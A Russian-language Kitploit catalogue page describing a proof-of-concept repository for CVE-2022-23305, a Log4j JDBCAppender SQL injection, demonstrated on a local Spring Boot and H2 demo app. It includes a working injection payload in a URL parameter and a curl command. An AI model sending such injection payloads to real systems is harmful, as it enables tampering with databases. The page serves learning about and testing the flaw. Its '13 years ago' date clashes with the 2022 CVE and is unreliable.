Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-23305_POC — CVE-2022-23305 Log4J JDBCAppender SQl инъекция POC | Kitploit
Инструменты/GitHubGitHub/tkomlodi/cve-2022-23305_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеБезопасность Баз ДанныхЛаборатории и Практика
GitHubtkomlodi/cve-2022-23305_poc

CVE-2022-23305_POC

CVE-2022-23305 Log4J JDBCAppender SQl инъекция POC

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-23305 Log4j JDBCAppender sql injection POC

Это очень простое приложение на основе Spring Boot, демонстрирующее уязвимость CVE-2022-23305. Оно использует Apache Maven, Spring Boot, Spring MVC и встроенную базу данных H2 для записи одной простой записи, полученной в качестве параметра строки запроса URL. Поскольку Log4J настроен на использование JDBCAppender, он уязвим для SQL-инъекций.

См. src/main/java/poc/InjectionController.java для оператора логирования.
См. папку src/main/resource для всех файлов конфигурации.

Вы можете запустить приложение с помощью Java и Maven, выполнив "mvn clean spring-boot:run".
Вы также можете запустить его как Docker-приложение, например:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

Приложение будет доступно по адресу http://localhost:8080/.
Чтобы использовать уязвимость, отправьте внедрённый SQL-запрос в качестве параметра, который будет записан в лог:
 "http://localhost:8080/?param=');insert into logs values(':("
В ответе будут перечислены добавленные записи лога, включая одну, добавленную SQL-инъекцией в параметр.
Чтобы сделать то же самое с помощью curl:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

Скачать инструмент